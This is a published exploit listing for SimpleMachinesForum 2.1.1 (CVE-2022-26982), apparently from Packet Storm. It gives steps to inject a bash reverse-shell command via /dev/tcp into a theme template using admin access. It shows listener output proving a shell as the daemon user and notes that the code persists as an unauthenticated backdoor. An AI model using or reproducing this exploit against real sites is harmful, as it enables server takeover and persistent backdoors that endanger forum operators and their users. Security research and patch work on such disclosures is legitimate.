Lucene search

K
packetstormSarang TumnePACKETSTORM:171486
HistoryMar 27, 2023 - 12:00 a.m.

SimpleMachinesForum 2.1.1 Remote Code Execution

2023-03-2700:00:00
Sarang Tumne
packetstormsecurity.com
132
remote code execution
authenticated
vulnerability
backdoor
admin credentials
web shell
cve-2022-26982
simplemachinesforum

EPSS

0.022

Percentile

89.7%

`# Exploit Title: SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution   
# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane)  
# Date: 7th March 2022  
# CVE ID: CVE-2022-26982  
# Confirmed on release 2.1.1  
# Vendor: https://download.simplemachines.org/  
# Note- Once we insert the vulnerable php code, we can even execute it without any valid login as it is not required! We can use it as a backdoor!  
  
###############################################  
#Step1- Login with Admin Credentials  
#Step2- Goto Admin=>Main=>Administration Center=>Configuration=>Themes and Layout=>Modify Themes=>Browse the templates and files in this theme.=>Admin.template.php  
#Step3- Now add the vulnerable php reverse tcp web shell exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4477 0>&1'"); ?>  
#Step4- Now Goto Add Media=>Add Resource=> Upload php web shell and click on SAVE CHANGES at the bottom of the page  
#Step5- Now click on "Themes and Layout" and you will get the reverse shell:  
E.g: Visit http://IP_ADDR/index.php?action=admin;area=theme;b4c2510f=bc6cde24d794569356b81afc98ede2c2 and get the reverse shell:  
  
listening on [any] 4477 ...  
connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 41276  
bash: cannot set terminal process group (1334): Inappropriate ioctl for device  
bash: no job control in this shell  
daemon@debian:/opt/bitnami/simplemachinesforum$ whoami  
whoami  
daemon  
daemon@debian:/opt/bitnami/simplemachinesforum$ id  
id  
uid=1(daemon) gid=1(daemon) groups=1(daemon)  
daemon@debian:/opt/bitnami/simplemachinesforum$  
  
`

EPSS

0.022

Percentile

89.7%

Related for PACKETSTORM:171486